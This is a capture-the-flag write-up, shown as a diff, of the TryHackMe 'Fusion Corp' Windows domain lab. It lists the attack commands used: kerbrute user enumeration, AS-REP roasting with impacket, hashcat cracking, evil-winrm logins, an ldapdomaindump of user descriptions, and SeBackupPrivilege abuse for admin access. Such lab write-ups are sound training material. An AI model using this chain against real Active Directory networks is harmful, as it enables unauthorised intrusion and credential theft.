puckiestyle/tryhackme/fusioncorp.md

 1. Enum showed standard windows ports, a domain (fusion.corp) and a website on 80.
 2. Under 80, /backup/ contained 'employees.ods', which revealed a list of user names
-3. I used this list with kerbrute userenum: `kerbrute userenum -d fusion.corp --dc 10.10.87.193 TargetUsers.txt`, which revealed the user `lparker` and her pre-auth hash
+3. I used this list with kerbrute userenum: `python3 kerbrute.py -domain fusion.corp -dc-ip 10.10.224.114 -users ~/thm/fusioncorp/usernames.txt`, which revealed the user `lparker` but no pre-auth hash
-4. However the hash wasn't in a format for hashcat (and john couldn't break it) so I got a better hash with impacket: `python3 /opt/impacket/examples/GetNPUsers.py -dc-ip 10.10.119.239 -no-pass -format hashcat fusion.corp/lparker`
+4. I got a better hash with impacket: `python3 /opt/impacket/examples/GetNPUsers.py -dc-ip 10.10.224.114 -no-pass -format hashcat fusion.corp/lparker`
-5. I cracked this hash with hashcat: `.\hashcat.exe -m 18200 ..\hash ..\wordlists\rockyou.txt`
+5. I cracked this hash with hashcat: `E:\PENTEST\hashcat>hashcat32 -m 18200 -a 0 hash rockyou.txt`
 6. This allowed me to login via evil-winrm: `evil-winrm -i 10.10.87.193 -u lparker -p 'password'`, and get the first flag
-7. lparker had very little rights, so I used the creds to instead enumerate ldap: `ldapdomaindump 10.10.87.193 -u 'fusion.corp\lparker' -p 'password'`.
+7. lparker had very little rights, so I used the creds to instead enumerate ldap: `ldapdomaindump 10.10.224.114 -u 'fusion.corp\lparker' -p 'password'`.
 8. Under the domain users, this showed `jmurphy` and the password in the user description.
 I used evil-winrm again to get the second flag.
 9. jmurphy had the SeBackupPrivilege, which allowed me to use https://github.com/Hackplayers/PsCabesha-tools/blob/master/Privesc/Acl-FullControl.ps1 to gain ownership of the Admin user directory.
 This got me the final flag.